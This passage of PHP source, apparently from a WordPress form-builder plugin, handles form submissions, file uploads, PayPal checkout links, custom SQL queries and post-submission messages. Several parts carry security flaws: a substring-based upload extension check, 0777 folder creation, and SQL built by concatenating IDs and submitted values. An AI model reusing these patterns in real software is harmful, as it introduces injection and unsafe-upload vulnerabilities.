            if (isset($ss)) {
              $value = (isset($_POST[$i . "_hh" . $id]) ? $_POST[$i . "_hh" . $id] : "") . ':' . (isset($_POST[$i . "_mm" . $id]) ? $_POST[$i . "_mm" . $id] : "") . ':' . $ss;
            }
            else {
              $value = (isset($_POST[$i . "_hh" . $id]) ? $_POST[$i . "_hh" . $id] : "") . ':' . (isset($_POST[$i . "_mm" . $id]) ? $_POST[$i . "_mm" . $id] : "");
            }
            $am_pm = isset($_POST[$i . "_am_pm" . $id]) ? $_POST[$i . "_am_pm" . $id] : NULL;
            if (isset($am_pm))
              $value = $value . ' ' . $am_pm;
            break;
          }
          case "type_phone": {
            $value = (isset($_POST[$i . "_element_first" . $id]) ? $_POST[$i . "_element_first" . $id] : "") . ' ' . (isset($_POST[$i . "_element_last" . $id]) ? $_POST[$i . "_element_last" . $id] : "");
            break;
          }
          case "type_name": {
            $element_title = isset($_POST[$i . "_element_title" . $id]) ? esc_html($_POST[$i . "_element_title" . $id]) : NULL;
            if (isset($element_title)) {
              $value = $element_title . ' ' . (isset($_POST[$i . "_element_first" . $id]) ? esc_html($_POST[$i . "_element_first" . $id]) : "") . ' ' . (isset($_POST[$i . "_element_last" . $id]) ? esc_html($_POST[$i . "_element_last" . $id]) : "") . ' ' . (isset($_POST[$i . "_element_middle" . $id]) ? esc_html($_POST[$i . "_element_middle" . $id]) : "");
            }
            else {
              $value = (isset($_POST[$i . "_element_first" . $id]) ? esc_html($_POST[$i . "_element_first" . $id]) : "") . ' ' . (isset($_POST[$i . "_element_last" . $id]) ? esc_html($_POST[$i . "_element_last" . $id]) : "");
            }
            break;
          }
          case "type_file_upload": {
            $file = isset($_FILES[$i . '_file' . $id]) ? $_FILES[$i . '_file' . $id] : NULL;
            if ($file['name']) {
              $untilupload = $form->form;
              $pos1 = strpos($untilupload, "***destinationskizb" . $i . "***");
              $pos2 = strpos($untilupload, "***destinationverj" . $i . "***");
              $destination = substr($untilupload, $pos1 + (23 + (strlen($i) - 1)), $pos2 - $pos1 - (23 + (strlen($i) - 1)));
              $pos1 = strpos($untilupload, "***extensionskizb" . $i . "***");
              $pos2 = strpos($untilupload, "***extensionverj" . $i . "***");
              $extension = substr($untilupload, $pos1 + (21 + (strlen($i) - 1)), $pos2 - $pos1 - (21 + (strlen($i) - 1)));
              $pos1 = strpos($untilupload, "***max_sizeskizb" . $i . "***");
              $pos2 = strpos($untilupload, "***max_sizeverj" . $i . "***");
              $max_size = substr($untilupload, $pos1 + (20 + (strlen($i) - 1)), $pos2 - $pos1 - (20 + (strlen($i) - 1)));
              $fileName = $file['name'];
              $destination = str_replace(site_url() . '/', '', $destination);
              $fileSize = $file['size'];
              if ($fileSize > $max_size * 1024) {
                echo "<script> alert('" . addslashes(__('The file exceeds the allowed size of', 'form_maker')) . $max_size . " KB');</script>";
                return array($max + 1);
              }
              $uploadedFileNameParts = explode('.', $fileName);
              $uploadedFileExtension = array_pop($uploadedFileNameParts);
              $to = strlen($fileName) - strlen($uploadedFileExtension) - 1;
              $fileNameFree = substr($fileName, 0, $to);
              $invalidFileExts = explode(',', $extension);
              $extOk = FALSE;
              foreach ($invalidFileExts as $key => $value) {
                if (is_numeric(strpos(strtolower($value), strtolower($uploadedFileExtension)))) {
                  $extOk = TRUE;
                }
              }
              if ($extOk == FALSE) {
                echo "<script> alert('" . addslashes(__('Sorry, you are not allowed to upload this type of file.', 'form_maker')) . "');</script>";
                return array($max + 1);
              }
              $fileTemp = $file['tmp_name'];
              $p = 1;
			  
			  if(!file_exists($destination))
					mkdir($destination , 0777);
					
              if (file_exists($destination . "/" . $fileName)) {
                $fileName1 = $filename;
                while (file_exists($destination . "/" . $fileName1)) {
                  $to = strlen($file['name']) - strlen($uploadedFileExtension) - 1;
                  $fileName1 = substr($fileName, 0, $to) . '(' . $p . ').' . $uploadedFileExtension;
                  $file['name'] = $fileName;
                  $p++;
                }
                $fileName = $fileName1;
              }
              if (is_dir(ABSPATH . $destination)) {
                if (!move_uploaded_file($fileTemp, ABSPATH . $destination . '/' . $fileName)) {
                  echo "<script> alert('" . addslashes(__('Error, file cannot be moved.', 'form_maker')) . "');</script>";
                  return array($max + 1);
                }
              }
              else {
                echo "<script> alert('" . addslashes(__('Error, file destination does not exist.', 'form_maker')) . "');</script>";
                return array($max + 1);
              }
              $value = site_url() . '/' . $destination . '/' . $fileName . '*@@url@@*';
              $file['tmp_name'] = $destination . "/" . $fileName;
              $file['name'] = ABSPATH . $destination . "/" . $fileName;
              // $temp_file = array( "name" => $files['name'][$file_key], "type" => $files['type'][$file_key], "tmp_name" => $files['tmp_name'][$file_key]);
							array_push($all_files, $file);
            }
            break;
          }
          case 'type_address': {
            $value = '*#*#*#';
            if (isset($_POST[$i . "_street1" . $id])) {
              $value = esc_html($_POST[$i . "_street1" . $id]);
              break;
            }
            if (isset($_POST[$i . "_street2" . $id])) {
              $value = esc_html($_POST[$i . "_street2" . $id]);
              break;
            }
            if (isset($_POST[$i . "_city" . $id])) {
              $value = esc_html($_POST[$i . "_city" . $id]);
              break;
            }
            if (isset($_POST[$i . "_state" . $id])) {
              $value = esc_html($_POST[$i . "_state" . $id]);
              break;
            }
            if (isset($_POST[$i . "_postal" . $id])) {
              $value = esc_html($_POST[$i . "_postal" . $id]);
              break;
            }
            if (isset($_POST[$i . "_country" . $id])) {
              $value = esc_html($_POST[$i . "_country" . $id]);
              break;
            }
            break;
          }
          case "type_hidden": {
            $value = isset($_POST[$label_label[$key]]) ? $_POST[$label_label[$key]] : "";
            break;
          }
          case "type_radio": {
            $element = isset($_POST[$i . "_other_input" . $id]) ? $_POST[$i . "_other_input" . $id] : NULL;
            if (isset($element)) {
              $value = $element;
              break;
            }
            $value = isset($_POST[$i . "_element" . $id]) ? $_POST[$i . "_element" . $id] : "";
            break;
          }
          case "type_checkbox": {
            $start = -1;
            $value = '';
            for ($j = 0; $j < 100; $j++) {
              if (isset($_POST[$i . "_element" . $id . $j])) {
                $start = $j;
                break;
              }
            }
            $other_element_id = -1;
            $is_other = isset($_POST[$i . "_allow_other" . $id]) ? $_POST[$i . "_allow_other" . $id] : "";
            if ($is_other == "yes") {
              $other_element_id = isset($_POST[$i . "_allow_other_num" . $id]) ? $_POST[$i . "_allow_other_num" . $id] : "";
            }
            if ($start != -1) {
              for ($j = $start; $j < 100; $j++) {
                if (isset($_POST[$i . "_element" . $id . $j])) {
                  if ($j == $other_element_id) {
                    $value = $value . (isset($_POST[$i . "_other_input" . $id]) ? $_POST[$i . "_other_input" . $id] : "") . '***br***';
                  }
                  else {
                    $value = $value . $_POST[$i . "_element" . $id . $j] . '***br***';
                  }
                }
              }
            }
            break;
          }
          case "type_paypal_price": {
            $value = 0;
            if (isset($_POST[$i."_element_dollars".$id])) {
              $value = $_POST[$i . "_element_dollars" . $id];
            }
            $value = (int) preg_replace('/\D/', '', $value);
            if (isset($_POST[$i . "_element_cents" . $id])) {
              $value = $value . '.' . (preg_replace('/\D/', '', $_POST[$i . "_element_cents" . $id]));
            }
            $total += (float)($value);
            $paypal_option = array();
            if ($value != 0) {
              array_push($paypal['item_name'], $label_label[$key]);
              $quantity = ((isset($_POST[$i . "_element_quantity" . $id]) && ($_POST[$i . "_element_quantity" . $id] >= 1)) ? $_POST[$i . "_element_quantity" . $id] : 1);
              array_push($paypal['quantity'], $quantity);
              array_push($paypal['amount'], $value);
              $is_amount=true;
              array_push($paypal['on_os'], $paypal_option);
            }
            $value = $value . $form_currency;
            break;
          }
          case "type_paypal_select": {
            $value = '';
            $value = (isset($_POST[$i . "_element_label" . $id]) ? $_POST[$i . "_element_label" . $id] : "") . ' : ' . (isset($_POST[$i . "_element" . $id]) ? $_POST[$i . "_element" . $id] : "") . $form_currency;
            $quantity = ((isset($_POST[$i . "_element_quantity" . $id]) && ($_POST[$i . "_element_quantity" . $id] >= 1)) ? $_POST[$i . "_element_quantity" . $id] : 1);
            $total += (float)(isset($_POST[$i . "_element" . $id]) ? $_POST[$i . "_element" . $id] : 0) * (float)($quantity);
            array_push($paypal['item_name'], $label_label[$key] . ' ' . (isset($_POST[$i."_element_label".$id]) ? $_POST[$i."_element_label".$id] : ""));
            array_push($paypal['quantity'], $quantity);
            array_push($paypal['amount'], isset($_POST[$i."_element".$id]) ? $_POST[$i."_element".$id] : "");
            if(isset($_POST[$i."_element".$id]) && $_POST[$i."_element".$id] != 0) {
							$is_amount=true;
						}
            $element_quantity_label = isset($_POST[$i."_element_quantity_label".$id]) ? $_POST[$i."_element_quantity_label".$id] : NULL;
            if (isset($element_quantity_label)) {
              $value .= '***br***' . $element_quantity_label . ': ' . $quantity;
            }
            $paypal_option=array();
            $paypal_option['on']=array();
            $paypal_option['os']=array();
            for($k=0; $k<50; $k++) {
              $temp_val = isset($_POST[$i."_element_property_value".$id.$k]) ? $_POST[$i."_element_property_value".$id.$k] : NULL;
              if(isset($temp_val)) {			
                array_push($paypal_option['on'], isset($_POST[$i."_element_property_label".$id.$k]) ? $_POST[$i."_element_property_label".$id.$k] : "");
                array_push($paypal_option['os'], $temp_val);
                $value .= '***br***' . (isset($_POST[$i."_element_property_label".$id.$k]) ? $_POST[$i."_element_property_label".$id.$k] : "") . ': ' . $temp_val;
              }
            }
            array_push($paypal['on_os'], $paypal_option);
            break;
          }
          case "type_paypal_radio": {
            $value = '';
            if (isset($_POST[$i."_element_label".$id]) && ($_POST[$i."_element_label".$id] != '')) {
              $value = $_POST[$i."_element_label".$id] . ' - ' . (isset($_POST[$i."_element".$id]) ? $_POST[$i."_element".$id] : "") . $form_currency;
              $quantity = ((isset($_POST[$i . "_element_quantity" . $id]) && ($_POST[$i . "_element_quantity" . $id] >= 1)) ? $_POST[$i . "_element_quantity" . $id] : 1);
              $total+=(float)(isset($_POST[$i."_element".$id]) ? $_POST[$i."_element".$id] : 0)*(float)($quantity);
              array_push($paypal['item_name'], $label_label[$key] . ' ' . $_POST[$i."_element_label".$id]);
              array_push($paypal['quantity'], $quantity);
              array_push($paypal['amount'], isset($_POST[$i."_element".$id]) ? $_POST[$i."_element".$id] : "");
              if(isset($_POST[$i."_element".$id]) && $_POST[$i."_element".$id] != 0) {
                $is_amount=true;
              }
              $element_quantity_label = isset($_POST[$i."_element_quantity_label".$id]) ? $_POST[$i."_element_quantity_label".$id] : NULL;
              if (isset($element_quantity_label)) {
                $value .= '***br***' . $element_quantity_label . ': ' . $quantity;
              }
              $paypal_option = array();
              $paypal_option['on'] = array();
              $paypal_option['os'] = array();
              for ($k = 0; $k < 50; $k++) {
                $temp_val = isset($_POST[$i."_element_property_value".$id.$k]) ? $_POST[$i."_element_property_value".$id.$k] : NULL;
                if(isset($temp_val)) {			
                  array_push ($paypal_option['on'], isset($_POST[$i."_element_property_label".$id.$k]) ? $_POST[$i."_element_property_label".$id.$k] : "");
                  array_push ($paypal_option['os'], $temp_val);
                  $value .= '***br***' . (isset($_POST[$i."_element_property_label".$id.$k]) ? $_POST[$i."_element_property_label".$id.$k] : "") . ': ' . $temp_val;
                }
              }
              array_push ($paypal['on_os'], $paypal_option);
            }
            break;
          }
          case "type_paypal_shipping": {
            $value = '';
            if (isset($_POST[$i."_element_label".$id]) && ($_POST[$i."_element_label".$id] != '')) {
              $value = $_POST[$i."_element_label".$id] . ' - ' . (isset($_POST[$i."_element".$id]) ? $_POST[$i."_element".$id] : "") . $form_currency;
              $paypal['shipping'] = isset($_POST[$i."_element".$id]) ? $_POST[$i."_element".$id] : "";
            }
            break;
          }
          case "type_paypal_checkbox": {
            $start = -1;
            $value = '';
            for ($j = 0; $j < 100; $j++) {
              if (isset($_POST[$i."_element".$id.$j])) {
                $start = $j;
                break;
              }
            }
            $other_element_id = -1;
            $is_other = isset($_POST[$i."_allow_other".$id]) ? $_POST[$i."_allow_other".$id] : "";
            if ($is_other == "yes") {
              $other_element_id = isset($_POST[$i."_allow_other_num".$id]) ? $_POST[$i."_allow_other_num".$id] : "";
            }
            if ($start != -1) {
              for ($j = $start; $j < 100; $j++) {
                if (isset($_POST[$i."_element".$id.$j])) {
                  if ($j == $other_element_id) {
                    $value = $value . (isset($_POST[$i."_other_input".$id]) ? $_POST[$i."_other_input".$id] : "") . '***br***';
                  }
                  else {
                    $value = $value . (isset($_POST[$i."_element".$id.$j."_label"]) ? $_POST[$i."_element".$id.$j."_label"] : "") . ' - ' . ($_POST[$i."_element".$id.$j] == '' ? '0' : $_POST[$i."_element".$id.$j]) . $form_currency . '***br***';
                    $quantity = ((isset($_POST[$i . "_element_quantity" . $id]) && ($_POST[$i . "_element_quantity" . $id] >= 1)) ? $_POST[$i . "_element_quantity" . $id] : 1);
                    $total += (float)(isset($_POST[$i."_element".$id.$j]) ? $_POST[$i."_element".$id.$j] : 0) * (float)($quantity);
                    array_push($paypal['item_name'], $label_label[$key] . ' ' . (isset($_POST[$i."_element".$id.$j."_label"]) ? $_POST[$i."_element".$id.$j."_label"] : ""));
                    array_push($paypal['quantity'], $quantity);
                    array_push($paypal['amount'], ($_POST[$i."_element".$id.$j] == '') ? '0' : $_POST[$i."_element".$id.$j]);
                    if (isset($_POST[$i."_element".$id.$j]) && $_POST[$i."_element".$id.$j] != 0) {
                      $is_amount = TRUE;
                    }
                    $paypal_option = array();
                    $paypal_option['on'] = array();
                    $paypal_option['os'] = array();
                    for ($k = 0; $k < 50; $k++) {
                      $temp_val = isset($_POST[$i."_element_property_value".$id.$k]) ? $_POST[$i."_element_property_value".$id.$k] : NULL;
                      if (isset($temp_val)) {			
                        array_push ($paypal_option['on'], isset($_POST[$i."_element_property_label".$id.$k]) ? $_POST[$i."_element_property_label".$id.$k] : "");
                        array_push ($paypal_option['os'], $temp_val);
                      }
                    }
                    array_push ($paypal['on_os'], $paypal_option);
                  }
                }
              }
              $element_quantity_label = isset($_POST[$i."_element_quantity_label".$id]) ? $_POST[$i."_element_quantity_label".$id] : NULL;
              $quantity = ((isset($_POST[$i . "_element_quantity" . $id]) && ($_POST[$i . "_element_quantity" . $id] >= 1)) ? $_POST[$i . "_element_quantity" . $id] : 1);
              if (isset($element_quantity_label)) {
                $value .= $element_quantity_label . ': ' . $quantity . '***br***';
              }
              for ($k = 0; $k < 50; $k++) {
                $temp_val = isset($_POST[$i."_element_property_value".$id.$k]) ? $_POST[$i."_element_property_value".$id.$k] : NULL;
                if (isset($temp_val)) {			
                  $value .= (isset($_POST[$i."_element_property_label".$id.$k]) ? $_POST[$i."_element_property_label".$id.$k] : "") . ': ' . $temp_val . '***br***';
                }
              }
            }
            break;
          }
          case "type_star_rating": {
            if (isset($_POST[$i."_selected_star_amount".$id]) &&  $_POST[$i."_selected_star_amount".$id] != "") {
              $selected_star_amount = $_POST[$i."_selected_star_amount".$id];
            }
            else {
              $selected_star_amount = 0;
            }
            $value = (isset($_POST[$i."_star_amount".$id]) ? $_POST[$i."_star_amount".$id] : '').'***'.$selected_star_amount.'***'.(isset($_POST[$i."_star_color".$id]) ? $_POST[$i."_star_color".$id] : '').'***star_rating***';									
            break;
          }
          case "type_scale_rating": {
            $value = (isset($_POST[$i."_scale_radio".$id]) ? $_POST[$i."_scale_radio".$id] : 0).'/'.(isset($_POST[$i."_scale_amount".$id]) ? $_POST[$i."_scale_amount".$id] : '');
            break;
          }
          case "type_spinner": {
            $value = (isset($_POST[$i."_element".$id]) ? $_POST[$i."_element".$id] : '');
            break;
          }
          case "type_slider":	{
            $value = (isset($_POST[$i."_slider_value".$id]) ? $_POST[$i."_slider_value".$id] : '');
            break;
          }
          case "type_range": {
            $value = (isset($_POST[$i."_element".$id . '0']) ? $_POST[$i."_element".$id . '0'] : '') .'-'.(isset($_POST[$i."_element".$id.'1']) ? $_POST[$i."_element".$id.'1'] : '');
            break;
          }
          case "type_grading": {
            $value = "";
            if (isset($_POST[$i."_hidden_item".$id])) {
              $items = explode(":", $_POST[$i."_hidden_item".$id]);
              for ($k = 0; $k < sizeof($items) - 1; $k++) {
                if (isset($_POST[$i."_element".$id.$k])) {
                  $value .= $_POST[$i."_element".$id.$k].':';
                }
              }
              $value .= $_POST[$i."_hidden_item".$id].'***grading***';
            }
            break;
          }
          case "type_matrix": {
            $rows_of_matrix = explode("***", isset($_POST[$i."_hidden_row".$id]) ? $_POST[$i."_hidden_row".$id] : "");
            $rows_count = sizeof($rows_of_matrix) - 1;
            $column_of_matrix = explode("***", isset($_POST[$i."_hidden_column".$id]) ? $_POST[$i."_hidden_column".$id] : "");
            $columns_count = sizeof($column_of_matrix) - 1;
            $row_ids = explode(",", substr(isset($_POST[$i."_row_ids".$id]) ? $_POST[$i."_row_ids".$id] : "", 0, -1));
            $column_ids = explode(",", substr(isset($_POST[$i."_column_ids".$id]) ? $_POST[$i."_column_ids".$id] : "", 0, -1));
            if (isset($_POST[$i."_input_type".$id]) && $_POST[$i."_input_type".$id] == "radio") {
              $input_value="";
              foreach($row_ids as $row_id) {
                $input_value.=(isset($_POST[$i."_input_element".$id.$row_id]) ? $_POST[$i."_input_element".$id.$row_id] : 0)."***";
              }
            }
            if (isset($_POST[$i."_input_type".$id]) && $_POST[$i."_input_type".$id] == "checkbox") {
              $input_value="";
              foreach($row_ids as $row_id)
                foreach($column_ids as $column_id)
                  $input_value .= (isset($_POST[$i."_input_element".$id.$row_id.'_'.$column_id]) ? $_POST[$i."_input_element".$id.$row_id.'_'.$column_id] : 0)."***";
            }
            if (isset($_POST[$i."_input_type".$id]) && $_POST[$i."_input_type".$id] == "text") {
              $input_value="";
              foreach($row_ids as $row_id)
                foreach($column_ids as $column_id)
                  $input_value .= (isset($_POST[$i."_input_element".$id.$row_id.'_'.$column_id]) ? esc_html($_POST[$i."_input_element".$id.$row_id.'_'.$column_id]) : "")."***";
            }
            if (isset($_POST[$i."_input_type".$id]) && $_POST[$i."_input_type".$id] == "select") {
              $input_value="";
              foreach($row_ids as $row_id)
              foreach($column_ids as $column_id)
              $input_value .= (isset($_POST[$i."_select_yes_no".$id.$row_id.'_'.$column_id]) ? $_POST[$i."_select_yes_no".$id.$row_id.'_'.$column_id] : "")."***";	
            }
            $value = $rows_count . '***' . (isset($_POST[$i."_hidden_row".$id]) ? $_POST[$i."_hidden_row".$id] : "") . $columns_count . '***' . (isset($_POST[$i."_hidden_column".$id]) ? $_POST[$i."_hidden_column".$id] : "") . (isset($_POST[$i."_input_type".$id]) ? $_POST[$i."_input_type".$id] : "") . '***' .$input_value . '***matrix***';	
            break;
          }
        }
        if ($type == "type_address") {
          if ($value == '*#*#*#') {
            // break; ?????????????????????????????????????????????????????
            continue;
          }
        }
        $unique_element = isset($_POST[$i . "_unique" . $id]) ? $_POST[$i . "_unique" . $id] : "";
        if ($unique_element == 'yes') {
          $unique = $wpdb->get_col($wpdb->prepare("SELECT id FROM " . $wpdb->prefix . "formmaker_submits WHERE form_id= %d  and element_label= %s and element_value= %s", $id_old, $i, addslashes($value)));
          if ($unique) {
            echo "<script> alert('" . addslashes(__('This field %s requires a unique entry and this value was already submitted.', 'form_maker')) . "'.replace('%s','" . $label_label[$key] . "'));</script>";
            return array($max + 1);
          }
        }
       
        $r = $wpdb->prefix . "formmaker_submits";
        
        $save_or_no = $wpdb->insert($r, array(
            'form_id' => $id_old,
            'element_label' => $i,
            'element_value' => stripslashes($value),
            'group_id' => ($max + 1),
            'date' => date('Y-m-d H:i:s'),
            'ip' => $ip,
            'user_id_wd' => $current_user->ID,
          ), array(
            '%d',
            '%s',
            '%s',
            '%d',
            '%s',
            '%s',
            '%d'
          ));
        if (!$save_or_no) {
          return FALSE;
        }
        $chgnac = FALSE;
      }
    }

		
		$subid = $wpdb->get_var("SELECT MAX( group_id ) FROM " . $wpdb->prefix ."formmaker_submits" );
		$user_fields = array("subid"=>$subid, "ip"=>$ip, "userid"=>$wp_userid, "username"=>$wp_username, "useremail"=>$wp_useremail);

		$queries = $wpdb->get_results( $wpdb->prepare("SELECT * FROM " .$wpdb->prefix. "formmaker_query WHERE form_id=%d",(int)$id ));
		if($queries)
		{
			foreach($queries as $query)
			{
				$temp		= explode('***wdfcon_typewdf***',$query->details);
				$con_type	= $temp[0];
				$temp		= explode('***wdfcon_methodwdf***',$temp[1]);
				$con_method	= $temp[0];
				$temp		= explode('***wdftablewdf***',$temp[1]);
				$table_cur	= $temp[0];
				$temp		= explode('***wdfhostwdf***',$temp[1]);
				$host		= $temp[0];
				$temp		= explode('***wdfportwdf***',$temp[1]);
				$port		= $temp[0];
				$temp		= explode('***wdfusernamewdf***',$temp[1]);
				$username	= $temp[0];
				$temp		= explode('***wdfpasswordwdf***',$temp[1]);
				$password	= $temp[0];
				$temp		= explode('***wdfdatabasewdf***',$temp[1]);
				$database	= $temp[0];
				
				$query=str_replace(array_keys($fvals), $fvals ,$query->query);		
				foreach($user_fields as $user_key=>$user_field)
					$query=str_replace('{'.$user_key.'}', $user_field , $query);		
		
				if($con_type == 'remote')
				{ 
					$wpdb_temp = new wpdb($username, $password, $database, $host);
					$wpdb_temp->query($query);				
				}
				else {
          $wpdb->query($query);
        }
			}
      // $wpdb= new wpdb(DB_USER, DB_PASSWORD, DB_NAME, DB_HOST);
		}
		
	$addons = array('WD_FM_MAILCHIMP' => 'MailChimp', 'WD_FM_REG' => 'Registration');
	foreach($addons as $addon => $addon_name)
	{	
		if (defined($addon) && is_plugin_active(constant($addon))) {
			$_GET['addon_task']='frontend';
			$_GET['form_id']=$id;
			$GLOBALS['fvals']=$fvals;
			do_action($addon.'_init');
		}				
	}
	
    $str = '';
    
    if ($form->paypal_mode)	{
      if ($paypal['item_name'])	{
        if ($is_amount)	{
          $tax = $form->tax;
          $currency = $form->payment_currency;
          $business = $form->paypal_email;
          $ip = $_SERVER['REMOTE_ADDR'];       
          $total2 = round($total, 2);
          $save_or_no = $wpdb->insert($wpdb->prefix . "formmaker_submits", array(
            'form_id' => $id,
            'element_label' => 'item_total',
            'element_value' => $total2 . $form_currency,
            'group_id' => ($max + 1),
            'date' => date('Y-m-d H:i:s'),
            'ip' => $ip,
            'user_id_wd' => $current_user->ID,
          ), array(
            '%d',
            '%s',
            '%s',
            '%d',
            '%s',
            '%s',
            '%d'
          ));
          if (!$save_or_no) {
            return false;
          }
          $total = $total + ($total * $tax) / 100;
          if (isset($paypal['shipping'])) {
            $total = $total + $paypal['shipping'];
          }
          $total = round($total, 2);        
          $save_or_no = $wpdb->insert($wpdb->prefix . "formmaker_submits", array(
            'form_id' => $id,
            'element_label' => 'total',
            'element_value' => $total . $form_currency,
            'group_id' => ($max + 1),
            'date' => date('Y-m-d H:i:s'),
            'ip' => $ip,
            'user_id_wd' => $current_user->ID,
          ), array(
            '%d',
            '%s',
            '%s',
            '%d',
            '%s',
            '%s',
            '%d'
          ));
          if (!$save_or_no) {
            return false;
          }
          $save_or_no = $wpdb->insert($wpdb->prefix . "formmaker_submits", array(
            'form_id' => $id,
            'element_label' => '0',
            'element_value' => 'In progress',
            'group_id' => ($max + 1),
            'date' => date('Y-m-d H:i:s'),
            'ip' => $ip,
            'user_id_wd' => $current_user->ID,
          ), array(
            '%d',
            '%s',
            '%s',
            '%d',
            '%s',
            '%s',
            '%d'
          ));
          if (!$save_or_no) {
            return false;
          }
          $str = '';
          if ($form->checkout_mode==1 || $form->checkout_mode == "production") {
            $str .= "https://www.paypal.com/cgi-bin/webscr?";
          }
          else {
            $str .= "https://www.sandbox.paypal.com/cgi-bin/webscr?";
          }
          $str .= "currency_code=" . $currency;
          $str .= "&business=" . urlencode($business);
          $str .= "&cmd=" . "_cart";
          $str .= "&notify_url=" . admin_url('admin-ajax.php?action=checkpaypal%26form_id=' . $id . '%26group_id=' . ($max + 1));
          $str .= "&upload=" . "1";
          $str .= "&charset=UTF-8";
          if (isset($paypal['shipping'])) {
            $str = $str . "&shipping_1=" . $paypal['shipping'];
            //	$str=$str."&weight_cart=".$paypal['shipping'];
            //	$str=$str."&shipping2=3".$paypal['shipping'];
            $str = $str."&no_shipping=2";
          }
          $i=0;
          foreach ($paypal['item_name'] as $pkey => $pitem_name) {
            if($paypal['amount'][$pkey]) {
              $i++;
              $str = $str."&item_name_".$i."=".urlencode($pitem_name);
              $str = $str."&amount_".$i."=".$paypal['amount'][$pkey];
              $str = $str."&quantity_".$i."=".$paypal['quantity'][$pkey];
              if ($tax) {
                $str = $str . "&tax_rate_" . $i . "=" . $tax;
              }
              if ($paypal['on_os'][$pkey]) {
                foreach ($paypal['on_os'][$pkey]['on'] as $on_os_key => $on_item_name) {
                  $str = $str."&on".$on_os_key."_".$i."=".$on_item_name;
                  $str = $str."&os".$on_os_key."_".$i."=".$paypal['on_os'][$pkey]['os'][$on_os_key];
                }
              }
            }
          }
        }
      }
    }
	
	if($form->mail_verify){	
		unset($_SESSION['hash']);
		unset($_SESSION['gid']);
		$ip = $_SERVER['REMOTE_ADDR'];	
		$_SESSION['gid']  = $max+1;
		$send_tos = explode('**',$form->send_to);
		if($send_tos){
			foreach($send_tos as $send_index => $send_to)
			{
				$_SESSION['hash'][] = md5($ip.time().rand());
				$send_to = str_replace('*', '',$send_to);		
				$save_or_no = $wpdb->insert($wpdb->prefix . "formmaker_submits", array(
					'form_id' => $id,
					'element_label' => 'verifyInfo@'.$send_to,
					'element_value' => $_SESSION['hash'][$send_index]."**".$form->mail_verify_expiretime."**".$send_to,
					'group_id' => ($max + 1),
					'date' => date('Y-m-d H:i:s'),
					'ip' => $ip,
					'user_id_wd' => $current_user->ID,
				  ), array(
					'%d',
					'%s',
					'%s',
					'%d',
					'%s',
					'%s',
					'%d'
				  ));
				if (!$save_or_no) {
					return false;
				}  
			}
		}
	}
	
	
    if ($chgnac) {
		global $wpdb;
		if ($form->submit_text_type != 4) {
			$_SESSION['massage_after_submit' . $id] = addslashes(addslashes(__('Nothing was submitted.', 'form_maker')));
		}
		$_SESSION['error_or_no' . $id] = 1;
		$_SESSION['form_submit_type' . $id] = $form->submit_text_type . "," . $form->id;
		wp_redirect($_SERVER["REQUEST_URI"]);
		exit;
    }

    $addons = array('WD_FM_GDRIVE_INT' => 'GDriveInt', 'WD_FM_DBOX_INT' => 'DboxInt', 'WD_FM_POST_GEN' => 'PostGen', 'WD_FM_PUSHOVER' => 'Pushover'); // the sequence is important for google drive and drop box addons !!!!!!!!!!
    foreach($addons as $addon => $addon_name) {	
        if (defined($addon) && is_plugin_active(constant($addon))) {
            $_GET['addon_task'] = 'frontend';
            $_GET['form_id'] = $id;
            $GLOBALS['all_files'] = json_encode($all_files);
            $GLOBALS['form_currency'] = $form_currency;
            do_action($addon.'_init');
        }				
    }
    return array($all_files, $str);
  }

  public function remove($group_id) {
    global $wpdb;
    $wpdb->query($wpdb->prepare('DELETE FROM ' . $wpdb->prefix . 'formmaker_submits WHERE group_id= %d', $group_id));
  }
  
   public function get_after_submission_text($form_id) {
    global $wpdb;
	$submit_text = $wpdb->get_var("SELECT submit_text FROM " . $wpdb->prefix . "formmaker WHERE id='" . $form_id . "'");
	$current_user =  wp_get_current_user();
	if ($current_user->ID != 0){
		$userid =  $current_user->ID;
		$username =  $current_user->display_name;
		$useremail =  $current_user->user_email;
	} else{
		$userid =  '';
		$username = '';
		$useremail = '';
	}
	$ip = $_SERVER['REMOTE_ADDR'];
	$subid = $wpdb->get_var("SELECT MAX( group_id ) FROM " . $wpdb->prefix ."formmaker_submits" );	
	$row = $wpdb->get_row($wpdb->prepare("SELECT * FROM " . $wpdb->prefix . "formmaker WHERE id=%d", $form_id));
	
	$old = false;		
	if(isset($row->form)) {
		$old = true;
	}
	$label_order_original = array();
	$label_order_ids = array();
	$submission_array = array();
	if($old == false || ($old == true && $row->form == '')) {
		$label_all = explode('#****#',$row->label_order_current);
	} else {
		$label_all = explode('#****#',$row->label_order);    
	}
	$label_all = array_slice($label_all, 0, count($label_all) - 1);
	foreach ($label_all as $key => $label_each) {
		$label_id_each = explode('#**id**#', $label_each);
		$label_id = $label_id_each[0];
		array_push($label_order_ids, $label_id);
		$label_order_each = explode('#**label**#', $label_id_each[1]);
		$label_order_original[$label_id] = $label_order_each[0];
	}
	
	$submissions_row = $wpdb->get_results($wpdb->prepare("SELECT `element_label`, `element_value` FROM " . $wpdb->prefix . "formmaker_submits WHERE form_id=%d AND group_id=%d", $form_id, $subid));
	foreach ($submissions_row as $sub_row){
		$submission_array[$sub_row->element_label] = $sub_row->element_value;
	}

	foreach($label_order_original as $key => $label_each) {
		if(strpos($submit_text, "%".$label_each."%")>-1)	 {				
			$submit_text = str_replace("%".$label_each."%", $submission_array[$key], $submit_text);
		}
	}
	
	$custom_fields = array( "subid"=>$subid, "ip"=>$ip, "userid"=>$userid, "username"=>$username, "useremail"=>$useremail);	
	foreach($custom_fields as $key=>$custom_field)
	{
		if(strpos($submit_text, "%".$key."%")>-1)
			$submit_text = str_replace("%".$key."%", $custom_field, $submit_text);
	}
	$submit_text = str_replace(array("***map***", "*@@url@@*", "@@@@@@@@@", "@@@", "***grading***", "***br***", "***star_rating***"), array(" ", "", " ", " ", " ", ", ", " "), $submit_text);
	
    return $submit_text;
  }
  
  public function increment_views_count($id) {
    global $wpdb;
    $vives_form = $wpdb->get_var($wpdb->prepare("SELECT views FROM " . $wpdb->prefix . "formmaker_views WHERE form_id=%d", $id));
    if (isset($vives_form)) {
    $vives_form = $vives_form + 1;
    $wpdb->update($wpdb->prefix . "formmaker_views", array(
        'views' => $vives_form,
      ), array('form_id' => $id), array(
        '%d',
      ), array('%d'));
    }
    else {
      $wpdb->insert($wpdb->prefix . 'formmaker_views', array(
        'form_id' => $id,
        'views' => 1
        ), array(
          '%d',
          '%d'
      ));
    }
  }

	public function gen_mail($counter, $all_files, $id, $str) {
            // checking save uploads option
            global $wpdb;           
            $save_uploads = $wpdb->get_var("SELECT save_uploads FROM " . $wpdb->prefix ."formmaker WHERE id=" . $id);
            if($save_uploads == 0){
